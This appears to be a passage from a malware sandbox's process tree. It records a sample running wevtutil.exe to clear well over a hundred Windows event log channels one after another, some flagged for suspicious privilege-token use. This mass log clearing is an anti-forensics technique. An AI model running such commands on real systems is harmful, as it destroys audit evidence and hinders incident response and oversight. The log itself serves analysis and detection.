C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"3⤵PID:616
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"3⤵PID:1048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"3⤵PID:1532
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"3⤵PID:1744
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"3⤵PID:792
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"3⤵PID:1136
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵PID:1056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵PID:1612
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Admin"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Analytic"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Debug"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Operational"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"3⤵PID:1968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"3⤵PID:740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"3⤵PID:1568
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"3⤵PID:1088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"3⤵PID:2008
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"3⤵PID:2020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"3⤵PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"3⤵PID:1040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"3⤵PID:1360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"3⤵PID:788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"3⤵PID:1968
-
-
